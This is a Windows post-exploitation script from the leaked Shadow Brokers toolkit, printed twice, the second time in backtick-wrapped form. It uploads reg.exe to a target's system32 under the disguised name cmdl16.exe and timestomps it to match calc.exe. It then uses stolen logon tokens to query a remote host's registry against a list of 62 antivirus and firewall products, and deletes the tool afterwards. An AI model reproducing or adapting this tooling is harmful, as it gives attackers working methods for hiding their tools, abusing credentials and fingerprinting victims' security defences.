shadowbrokers-exploits/windows/Resources/Ep/Scripts/r_reg.eps

#-------------------------------------------------------------------------------
# File: r_reg.eps
# Description: Uploads the reg.exe tool to the targets system32 directory.
# 27 August 2008  Created....
#
#-------------------------------------------------------------------------------

string $ScriptsDir = GetEnv("SCRIPTSDIR");
string $sSysPath = GetEnv("SYSPATH");
string $remoteToolName = GetEnv("remoteToolName");

if ($remoteToolName == "") {
	$remoteToolName="$sSysPath\\cmdl16.exe";
} 

string $viable;
string $values;

string $psp;
string $reg;
string $os;
string $osreg;

$psp[0] = "Symantec - Norton Anti-Virus [7.5]";
$psp[1] = "Symantec - Norton Anti-Virus [2003 - 2008]";
$psp[2] = "Symantec - Endpoint Protection";
$psp[3] = "Symantec - Sygate Personal Firewall [5.6]";
$psp[4] = "McAfee - VirusScan [7.0 - 8.0]";
$psp[5] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSROOT";
$psp[6] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSROOT";
$psp[7] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSTEM32";
$psp[8] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSTEM32";
$psp[9] = "McAfee - VirusScan [8.5]";
$psp[10] = "McAfee - VirusScan [8.5]-> Access Protection Rules";
$psp[11] = "Kaspersky Lab - Anti-Virus [6]";
$psp[12] = "Kaspersky Lab - Anti-Virus [6]-> Enviroment";
$psp[13] = "Kaspersky Lab - Anti-Virus [6]-> Registry Guard";
$psp[14] = "Kaspersky Lab - Anti-Virus [6]-> Dangerous Behavior";
$psp[15] = "Kaspersky Lab - Anti-Virus [6]-> Process Injection";
$psp[16] = "Kaspersky Lab - Anti-Virus [6]-> Process Hiding";
$psp[17] = "Kaspersky Lab - Anti-Virus [6]-> Behavior Blocking";
$psp[18] = "Kaspersky Lab - Anti-Virus [7 , 2009]";
$psp[19] = "Kaspersky Lab - Anti-Virus [7]-> Enviroment";
$psp[20] = "Kaspersky Lab - Anti-Virus [7]-> Registry Guard";
$psp[21] = "Kaspersky Lab - Anti-Virus [7]-> Dangerous Behavior";
$psp[22] = "Kaspersky Lab - Anti-Virus [7]-> Process Injection";
$psp[23] = "Kaspersky Lab - Anti-Virus [7]-> Process Hiding";
$psp[24] = "Kaspersky Lab - Anti-Virus [7]-> Behavior Blocking";
$psp[25] = "8Signs - 8Signs Firewall";
$psp[26] = "Ahn - Ahn Lab";
$psp[27] = "ALWIL Software - AVAST! [4.x]";
$psp[28] = "AVG - Anti-Virus,Anti-Spyware[7.5]";
$psp[29] = "AVIRA - AntiVir [Classic,Premium,Workstation,Security Suite]";
$psp[30] = "BitDefender - Total Security [2008]";
$psp[31] = "BlackIce - Firewall";
$psp[32] = "Checkpoint - Zone Alarm [Anti-Virus,Firewall,Security Suite 7]";
$psp[33] = "Comodo - Firwall Pro [3.0]";
$psp[34] = "Computer Associates - eTrust Security";
$psp[35] = "Computer Associates - eTrust Internet Security Suite";
$psp[36] = "Computer Associates - eTrust Anti-Virus [8.4]";
$psp[37] = "Computer Associates - eTrust Anti-Spyware [9.1]";
$psp[38] = "Computer Assoicates - eTrust Anti-Spam [5.1]";
$psp[39] = "Computer Assoicates - eTrust Firewall";
$psp[40] = "Computer Assoicates - Jinchen Kill";
$psp[41] = "DrWeb - Anti-Virus, Enterpise Edition";
$psp[42] = "ESET - Anti-Virus, Smart Security Suite [3.0]";
$psp[43] = "KingSoft - Internet Security [2008]";
$psp[44] = "KingSoft - Internet Security [2008]-> Firewall Level Lan";
$psp[45] = "KingSoft - Internet Security [2008]-> Firewall Level Wide";
$psp[46] = "KingSoft - Internet Security [2008]-> Anti-Virus Settings";
$psp[47] = "Microsoft - Antispyware";
$psp[48] = "Microsoft - Windows Defender";
$psp[49] = "Microsoft - Windows Defender-> Threat Severity";
$psp[50] = "Microsoft - Windows Defender-> Real-Time Protection";
$psp[51] = "Microsoft - Windows Defender-> Disable Key";
$psp[52] = "Panda Software - Anti Virus [Titanium, Platinium]";
$psp[53] = "Panda Software - Anti Virus [Lite]-> Product";
$psp[54] = "Panda Software - Anti Virus [Lite]-> Version";
$psp[55] = "Panda Software - Administrator [3]";
$psp[56] = "Rising - AntiVirus [2007,2008]-> Name";
$psp[57] = "Rising - AntiVirus [2007,2008]-> Version";
$psp[58] = "SiliVaccine - AntiVirus [2005]";
$psp[59] = "ThreatFire - Firewall";
$psp[60] = "Trend Micro - Internet Security [2007]";
$psp[61] = "Trend Micro - OfficeScan [7.3, 8.0]";


$reg[0] = "HKLM\\Software\\Symantec\\Symantec Antivirus\\Install";
$reg[1] = "HKLM\\Software\\Symantec\\Norton Antivirus\\version";
$reg[2] = "HKLM\\software\\symantec\\symantec endpoint protection";
$reg[3] = "HKLM\\software\\Sygate Technologies, Inc.\\Sygate Personal Firewall\\version";
$reg[4] = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator\\Application Plugins";
$reg[5] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_27";
$reg[6] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_28";
$reg[7] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_29";
$reg[8] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_30";
$reg[9] = "HKLM\\Software\\McAfee\\ePolicy Orchestrator\\Application Plugins";
$reg[10] = "HKLM\\software\\McAfee\\VSCore\\On Access Scanner\\BehaviourBlocking\\AccessProtectionUserRules";
$reg[11] = "HKLM\\Software\\KasperskyLab\\AVP6";
$reg[12] = "HKLM\\Software\\KasperskyLab\\AVP6\\environment";
$reg[13] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";
$reg[14] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";
$reg[15] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";
$reg[16] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";
$reg[17] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\enabled";
$reg[18] = "HKLM\\software\\kasperskylab\\protected";
$reg[19] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\environment";
$reg[20] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";
$reg[21] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";
$reg[22] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";
$reg[23] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";
$reg[24] = "HKLM\\software\\kasperskylab\\protectedb\\AVP7\\profiles\\behavior_blocking\\enabled";
$reg[25] = "HKLM\\software\\8signs\\8signs Firewall";
$reg[26] = "HKLM\\software\\ahnlab";
$reg[27] = "HKLM\\software\\ALWIL Software\\AVAST";
$reg[28] = "HKLM\\software\\Grisoft";
$reg[29] = "HKLM\\software\\Avira";
$reg[30] = "HKLM\\software\\BitDefender";
$reg[31] = "HKLM\\software\\Network Ice\\BlackIce";
$reg[32] = "HKLM\\software\\zone labs\\zone alarm\\CurrentVersion";
$reg[33] = "HKLM\\software\\comodogroup\\cdi\\1\\product version";
$reg[34] = "HKLM\\software\\computerassociates\\eTrust Suite Personal";
$reg[35] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\Suite\\version";
$reg[36] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AV\\version";
$reg[37] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\PP\\version";
$reg[38] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AS\\version";
$reg[39] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\pfw\\version";
$reg[40] = "HKLM\\software\\computerassoicates\\eTrustITM\\CurrentVersion\\Version";
$reg[41] = "HKLM\\software\\Doctor Web, Ltd";
$reg[42] = "HKLM\\software\\eset\\eset security\\currentversion\\info";
$reg[43] = "HKLM\\Software\\Kingsoft\\antispy\\installpath";
$reg[44] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Lan";
$reg[45] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Wide";
$reg[46] = "HKLM\\Software\\Kingsoft\\antivirus\\KWatchSVC";
$reg[47] = "HKLM\\Software\\GIANTCompany\\AntiSpyware";
$reg[48] = "HKLM\\Software\\Microsoft\\Windows Defender";
$reg[49] = "HKLM\\Software\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction";
$reg[50] = "HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection";
$reg[51] = "HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware";
$reg[52] = "HKLM\\Software\\panda software\\pavshld\\products";
$reg[53] = "HKLM\\Software\\panda software\\panda antivirus lite\\product";
$reg[54] = "HKLM\\Software\\panda software\\panda antivirus lite\\version";
$reg[55] = "HKLM\\Software\\panda software";
$reg[56] = "HKLM\\Software\\rising\\rav\\name";
$reg[57] = "HKLM\\Software\\rising\\rav\\version";
$reg[58] = "HKLM\\Software\\STS Tech-Service\\SVaccine";
$reg[59] = "HKLM\\Software\\PCTools\\ThreatFire";
$reg[60] = "HKLM\\Software\\TrendMicro\\PC-cillin";
$reg[61] = "HKLM\\Software\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\\Misc.\\ProgramVer";


$os[0] = "Microsoft Windows XP - Professional Service Pack 3";

$osreg[0] = "HKLM\\software\\microsoft\\updates\\windows xp\\sp3";


string $split = SplitPath("$remoteToolName");

@echo on;


ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {
	$remoteToolName=GetInput("What do you want to upload the tool as?");
}

ifnot (`put $ScriptsDir\\..\\..\\Tools\\REG.exe -name $remoteToolName`) {
	echo "File already exists?";
	return false;
}

`matchtimes $sSysPath\\calc.exe $remoteToolName`;

string $remotemachine = GetInput("Enter Remote Machine [1.2.3.4 or netbios_name]");


ifnot(getViableTokens($viable, $values)) {
	echo "";
	echo "---------------------------------";
	echo "| Couldn't get Exisiting Tokens |";
	echo "---------------------------------";
}

echo "";
echo "";
echo "";


int $idx = 0;
int $j = 0;
echo "($j). QUIT";
while($idx < sizeof($viable)) {
	$j++;
	echo "($j). Use Token $viable[$idx] ($values[$idx])";
	$idx++;
}
$j++;
echo "($j). Enter own user";
$j++;
echo "($j). Already authenicated (WORKGROUP ZB)";


int $choice = GetInput("Enter the desired option");
int $j1 = $j;
$j1--;
string $user;
if($choice == 0){
	if (prompt `del $split[1] -path "$split[0]"`){
		sleep(300);
		`dir $split[1] -path "$split[0]"`;
	}
	return true;
}else if($choice == $j) {
	$user = "";
}else if($choice == $j1){
	$user = GetInput("Enter User/Token name");
}else{
	$choice--;
	$user = $viable[$choice];
}
	

while(prompt "Query target for Registry Key? [DO NOT QUIT, NO WILL STOP SCRIPT EXECUTE CLEANUP]") {
	int $i = 0;
	int $ind = 0;

	echo "($i). Quit";
	while($ind < sizeof($psp)) {
		$i++;
		echo "($i). PSP: $psp[$ind]";
		$ind++;
	}
	$ind = 0;
	while($ind < sizeof($os)) {
		$i++;
		echo "($i). OS: $os[$ind]";
		$ind++;
	}


	$i++;
	echo "($i). Enter custom query";
	

	int $regchoice = GetInput("Enter the desired query");
	string $key;

	
	if($regchoice == 0){
		if (prompt `del $split[1] -path "$split[0]"`){
			sleep(300);
			`dir $split[1] -path "$split[0]"`;
		}
		return true;
	} else if($regchoice == $i) {
		$key = GetInput("Enter Reg Key [Ex: HKLM\\Software\\PSP Key]");
	} else{
		$regchoice--;
		if($regchoice < sizeof($psp)) {
			$key = $reg[$regchoice];
		}else{
			int $idx1 = 0;
			while($idx1 < sizeof($psp)){
				$regchoice--;
				$idx1++;
			}
			$key = $osreg[$regchoice];
		}
	}
	

	if($user == ""){
		prompt `run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
	}else{
		prompt `user=$user run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
	}
}

if (prompt `del $split[1] -path "$split[0]"`){
	sleep(300);
	`dir $split[1] -path "$split[0]"`;
}

return true;

sub getViableTokens(REF string $token, REF string $value) {
	@record on;
	`lpgetenv`;
	@record off;
	
	string $envOption = GetCmdData("option");
	string $envValue  = GetCmdData("value");
	
	ifnot(defined($envOption)) {
		echo "Unable to list tokens";
		return false;
	}
	string $viableTokens;
	int $j = 0;
	int $k = 0;
	while($j < sizeof($envOption)) {
		string $temp = split("_USER_", $envOption[$j]);
		if(sizeof($temp) == 2) {
			if(strlen($temp[0]) == 0) {
				$token[$k] = $temp[1];
				$value[$k] = $envValue[$j];
				
				$k++;
			}
		}
		$j++;
	}
	return true;
}


#10.11.202.2
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 04:45:07 -05:00			`#-------------------------------------------------------------------------------`
			`# File: r_reg.eps`
			`# Description: Uploads the reg.exe tool to the targets system32 directory.`
			`# 27 August 2008 Created....`
			`#`
			`#-------------------------------------------------------------------------------`

			`string $ScriptsDir = GetEnv("SCRIPTSDIR");`
			`string $sSysPath = GetEnv("SYSPATH");`
			`string $remoteToolName = GetEnv("remoteToolName");`

			`if ($remoteToolName == "") {`
			`$remoteToolName="$sSysPath\\cmdl16.exe";`
			`}`

			`string $viable;`
			`string $values;`

			`string $psp;`
			`string $reg;`
			`string $os;`
			`string $osreg;`

			`$psp[0] = "Symantec - Norton Anti-Virus [7.5]";`
			`$psp[1] = "Symantec - Norton Anti-Virus [2003 - 2008]";`
			`$psp[2] = "Symantec - Endpoint Protection";`
			`$psp[3] = "Symantec - Sygate Personal Firewall [5.6]";`
			`$psp[4] = "McAfee - VirusScan [7.0 - 8.0]";`
			`$psp[5] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSROOT";`
			`$psp[6] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSROOT";`
			`$psp[7] = "McAfee - VirusScan [8.0]-> Prevent DLL creation in SYSTEM32";`
			`$psp[8] = "McAfee - VirusScan [8.0]-> Prevent EXE creation in SYSTEM32";`
			`$psp[9] = "McAfee - VirusScan [8.5]";`
			`$psp[10] = "McAfee - VirusScan [8.5]-> Access Protection Rules";`
			`$psp[11] = "Kaspersky Lab - Anti-Virus [6]";`
			`$psp[12] = "Kaspersky Lab - Anti-Virus [6]-> Enviroment";`
			`$psp[13] = "Kaspersky Lab - Anti-Virus [6]-> Registry Guard";`
			`$psp[14] = "Kaspersky Lab - Anti-Virus [6]-> Dangerous Behavior";`
			`$psp[15] = "Kaspersky Lab - Anti-Virus [6]-> Process Injection";`
			`$psp[16] = "Kaspersky Lab - Anti-Virus [6]-> Process Hiding";`
			`$psp[17] = "Kaspersky Lab - Anti-Virus [6]-> Behavior Blocking";`
			`$psp[18] = "Kaspersky Lab - Anti-Virus [7 , 2009]";`
			`$psp[19] = "Kaspersky Lab - Anti-Virus [7]-> Enviroment";`
			`$psp[20] = "Kaspersky Lab - Anti-Virus [7]-> Registry Guard";`
			`$psp[21] = "Kaspersky Lab - Anti-Virus [7]-> Dangerous Behavior";`
			`$psp[22] = "Kaspersky Lab - Anti-Virus [7]-> Process Injection";`
			`$psp[23] = "Kaspersky Lab - Anti-Virus [7]-> Process Hiding";`
			`$psp[24] = "Kaspersky Lab - Anti-Virus [7]-> Behavior Blocking";`
			`$psp[25] = "8Signs - 8Signs Firewall";`
			`$psp[26] = "Ahn - Ahn Lab";`
			`$psp[27] = "ALWIL Software - AVAST! [4.x]";`
			`$psp[28] = "AVG - Anti-Virus,Anti-Spyware[7.5]";`
			`$psp[29] = "AVIRA - AntiVir [Classic,Premium,Workstation,Security Suite]";`
			`$psp[30] = "BitDefender - Total Security [2008]";`
			`$psp[31] = "BlackIce - Firewall";`
			`$psp[32] = "Checkpoint - Zone Alarm [Anti-Virus,Firewall,Security Suite 7]";`
			`$psp[33] = "Comodo - Firwall Pro [3.0]";`
			`$psp[34] = "Computer Associates - eTrust Security";`
			`$psp[35] = "Computer Associates - eTrust Internet Security Suite";`
			`$psp[36] = "Computer Associates - eTrust Anti-Virus [8.4]";`
			`$psp[37] = "Computer Associates - eTrust Anti-Spyware [9.1]";`
			`$psp[38] = "Computer Assoicates - eTrust Anti-Spam [5.1]";`
			`$psp[39] = "Computer Assoicates - eTrust Firewall";`
			`$psp[40] = "Computer Assoicates - Jinchen Kill";`
			`$psp[41] = "DrWeb - Anti-Virus, Enterpise Edition";`
			`$psp[42] = "ESET - Anti-Virus, Smart Security Suite [3.0]";`
			`$psp[43] = "KingSoft - Internet Security [2008]";`
			`$psp[44] = "KingSoft - Internet Security [2008]-> Firewall Level Lan";`
			`$psp[45] = "KingSoft - Internet Security [2008]-> Firewall Level Wide";`
			`$psp[46] = "KingSoft - Internet Security [2008]-> Anti-Virus Settings";`
			`$psp[47] = "Microsoft - Antispyware";`
			`$psp[48] = "Microsoft - Windows Defender";`
			`$psp[49] = "Microsoft - Windows Defender-> Threat Severity";`
			`$psp[50] = "Microsoft - Windows Defender-> Real-Time Protection";`
			`$psp[51] = "Microsoft - Windows Defender-> Disable Key";`
			`$psp[52] = "Panda Software - Anti Virus [Titanium, Platinium]";`
			`$psp[53] = "Panda Software - Anti Virus [Lite]-> Product";`
			`$psp[54] = "Panda Software - Anti Virus [Lite]-> Version";`
			`$psp[55] = "Panda Software - Administrator [3]";`
			`$psp[56] = "Rising - AntiVirus [2007,2008]-> Name";`
			`$psp[57] = "Rising - AntiVirus [2007,2008]-> Version";`
			`$psp[58] = "SiliVaccine - AntiVirus [2005]";`
			`$psp[59] = "ThreatFire - Firewall";`
			`$psp[60] = "Trend Micro - Internet Security [2007]";`
			`$psp[61] = "Trend Micro - OfficeScan [7.3, 8.0]";`





			`$reg[0] = "HKLM\\Software\\Symantec\\Symantec Antivirus\\Install";`
			`$reg[1] = "HKLM\\Software\\Symantec\\Norton Antivirus\\version";`
			`$reg[2] = "HKLM\\software\\symantec\\symantec endpoint protection";`
			`$reg[3] = "HKLM\\software\\Sygate Technologies, Inc.\\Sygate Personal Firewall\\version";`
			`$reg[4] = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator\\Application Plugins";`
			`$reg[5] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_27";`
			`$reg[6] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_28";`
			`$reg[7] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_29";`
			`$reg[8] = "HKLM\\software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking\\FileBlockEnabled_30";`
			`$reg[9] = "HKLM\\Software\\McAfee\\ePolicy Orchestrator\\Application Plugins";`
			`$reg[10] = "HKLM\\software\\McAfee\\VSCore\\On Access Scanner\\BehaviourBlocking\\AccessProtectionUserRules";`
			`$reg[11] = "HKLM\\Software\\KasperskyLab\\AVP6";`
			`$reg[12] = "HKLM\\Software\\KasperskyLab\\AVP6\\environment";`
			`$reg[13] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";`
			`$reg[14] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";`
			`$reg[15] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";`
			`$reg[16] = "HKLM\\Software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";`
			`$reg[17] = "HKLM\\software\\kasperskylab\\AVP6\\profiles\\behavior_blocking\\enabled";`
			`$reg[18] = "HKLM\\software\\kasperskylab\\protected";`
			`$reg[19] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\environment";`
			`$reg[20] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\bRegMonitoring_Enabled";`
			`$reg[21] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0000";`
			`$reg[22] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0002";`
			`$reg[23] = "HKLM\\software\\kasperskylab\\protected\\AVP7\\profiles\\behavior_blocking\\profiles\\pdm\\settings\\Set\\0003";`
			`$reg[24] = "HKLM\\software\\kasperskylab\\protectedb\\AVP7\\profiles\\behavior_blocking\\enabled";`
			`$reg[25] = "HKLM\\software\\8signs\\8signs Firewall";`
			`$reg[26] = "HKLM\\software\\ahnlab";`
			`$reg[27] = "HKLM\\software\\ALWIL Software\\AVAST";`
			`$reg[28] = "HKLM\\software\\Grisoft";`
			`$reg[29] = "HKLM\\software\\Avira";`
			`$reg[30] = "HKLM\\software\\BitDefender";`
			`$reg[31] = "HKLM\\software\\Network Ice\\BlackIce";`
			`$reg[32] = "HKLM\\software\\zone labs\\zone alarm\\CurrentVersion";`
			`$reg[33] = "HKLM\\software\\comodogroup\\cdi\\1\\product version";`
			`$reg[34] = "HKLM\\software\\computerassociates\\eTrust Suite Personal";`
			`$reg[35] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\Suite\\version";`
			`$reg[36] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AV\\version";`
			`$reg[37] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\PP\\version";`
			`$reg[38] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\AS\\version";`
			`$reg[39] = "HKLM\\software\\computerassociates\\eTrust Suite Personal\\pfw\\version";`
			`$reg[40] = "HKLM\\software\\computerassoicates\\eTrustITM\\CurrentVersion\\Version";`
			`$reg[41] = "HKLM\\software\\Doctor Web, Ltd";`
			`$reg[42] = "HKLM\\software\\eset\\eset security\\currentversion\\info";`
			`$reg[43] = "HKLM\\Software\\Kingsoft\\antispy\\installpath";`
			`$reg[44] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Lan";`
			`$reg[45] = "HKCU\\Software\\Kingsoft\\antivirus\\KavPFW\\Security Level Wide";`
			`$reg[46] = "HKLM\\Software\\Kingsoft\\antivirus\\KWatchSVC";`
			`$reg[47] = "HKLM\\Software\\GIANTCompany\\AntiSpyware";`
			`$reg[48] = "HKLM\\Software\\Microsoft\\Windows Defender";`
			`$reg[49] = "HKLM\\Software\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction";`
			`$reg[50] = "HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection";`
			`$reg[51] = "HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware";`
			`$reg[52] = "HKLM\\Software\\panda software\\pavshld\\products";`
			`$reg[53] = "HKLM\\Software\\panda software\\panda antivirus lite\\product";`
			`$reg[54] = "HKLM\\Software\\panda software\\panda antivirus lite\\version";`
			`$reg[55] = "HKLM\\Software\\panda software";`
			`$reg[56] = "HKLM\\Software\\rising\\rav\\name";`
			`$reg[57] = "HKLM\\Software\\rising\\rav\\version";`
			`$reg[58] = "HKLM\\Software\\STS Tech-Service\\SVaccine";`
			`$reg[59] = "HKLM\\Software\\PCTools\\ThreatFire";`
			`$reg[60] = "HKLM\\Software\\TrendMicro\\PC-cillin";`
			`$reg[61] = "HKLM\\Software\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\\Misc.\\ProgramVer";`


			`$os[0] = "Microsoft Windows XP - Professional Service Pack 3";`

			`$osreg[0] = "HKLM\\software\\microsoft\\updates\\windows xp\\sp3";`


			`string $split = SplitPath("$remoteToolName");`

			`@echo on;`


			`ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {`
			`$remoteToolName=GetInput("What do you want to upload the tool as?");`
			`}`

			ifnot (`put $ScriptsDir\\..\\..\\Tools\\REG.exe -name $remoteToolName`) {
			`echo "File already exists?";`
			`return false;`
			`}`

			`matchtimes $sSysPath\\calc.exe $remoteToolName`;

			`string $remotemachine = GetInput("Enter Remote Machine [1.2.3.4 or netbios_name]");`


			`ifnot(getViableTokens($viable, $values)) {`
			`echo "";`
			`echo "---------------------------------";`
			`echo "\| Couldn't get Exisiting Tokens \|";`
			`echo "---------------------------------";`
			`}`

			`echo "";`
			`echo "";`
			`echo "";`



			`int $idx = 0;`
			`int $j = 0;`
			`echo "($j). QUIT";`
			`while($idx < sizeof($viable)) {`
			`$j++;`
			`echo "($j). Use Token $viable[$idx] ($values[$idx])";`
			`$idx++;`
			`}`
			`$j++;`
			`echo "($j). Enter own user";`
			`$j++;`
			`echo "($j). Already authenicated (WORKGROUP ZB)";`




			`int $choice = GetInput("Enter the desired option");`
			`int $j1 = $j;`
			`$j1--;`
			`string $user;`
			`if($choice == 0){`
			if (prompt `del $split[1] -path "$split[0]"`){
			`sleep(300);`
			`dir $split[1] -path "$split[0]"`;
			`}`
			`return true;`
			`}else if($choice == $j) {`
			`$user = "";`
			`}else if($choice == $j1){`
			`$user = GetInput("Enter User/Token name");`
			`}else{`
			`$choice--;`
			`$user = $viable[$choice];`
			`}`



			`while(prompt "Query target for Registry Key? [DO NOT QUIT, NO WILL STOP SCRIPT EXECUTE CLEANUP]") {`
			`int $i = 0;`
			`int $ind = 0;`

			`echo "($i). Quit";`
			`while($ind < sizeof($psp)) {`
			`$i++;`
			`echo "($i). PSP: $psp[$ind]";`
			`$ind++;`
			`}`
			`$ind = 0;`
			`while($ind < sizeof($os)) {`
			`$i++;`
			`echo "($i). OS: $os[$ind]";`
			`$ind++;`
			`}`


			`$i++;`
			`echo "($i). Enter custom query";`


			`int $regchoice = GetInput("Enter the desired query");`
			`string $key;`


			`if($regchoice == 0){`
			if (prompt `del $split[1] -path "$split[0]"`){
			`sleep(300);`
			`dir $split[1] -path "$split[0]"`;
			`}`
			`return true;`
			`} else if($regchoice == $i) {`
			`$key = GetInput("Enter Reg Key [Ex: HKLM\\Software\\PSP Key]");`
			`} else{`
			`$regchoice--;`
			`if($regchoice < sizeof($psp)) {`
			`$key = $reg[$regchoice];`
			`}else{`
			`int $idx1 = 0;`
			`while($idx1 < sizeof($psp)){`
			`$regchoice--;`
			`$idx1++;`
			`}`
			`$key = $osreg[$regchoice];`
			`}`
			`}`


			`if($user == ""){`
			prompt `run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
			`}else{`
			prompt `user=$user run -command "$remoteToolName QUERY \\"$key\\" \\\\$remotemachine" -redirect`;
			`}`
			`}`

			if (prompt `del $split[1] -path "$split[0]"`){
			`sleep(300);`
			`dir $split[1] -path "$split[0]"`;
			`}`

			`return true;`

			`sub getViableTokens(REF string $token, REF string $value) {`
			`@record on;`
			`lpgetenv`;
			`@record off;`

			`string $envOption = GetCmdData("option");`
			`string $envValue = GetCmdData("value");`

			`ifnot(defined($envOption)) {`
			`echo "Unable to list tokens";`
			`return false;`
			`}`
			`string $viableTokens;`
			`int $j = 0;`
			`int $k = 0;`
			`while($j < sizeof($envOption)) {`
			`string $temp = split("_USER_", $envOption[$j]);`
			`if(sizeof($temp) == 2) {`
			`if(strlen($temp[0]) == 0) {`
			`$token[$k] = $temp[1];`
			`$value[$k] = $envValue[$j];`

			`$k++;`
			`}`
			`}`
			`$j++;`
			`}`
			`return true;`
			`}`


			`#10.11.202.2`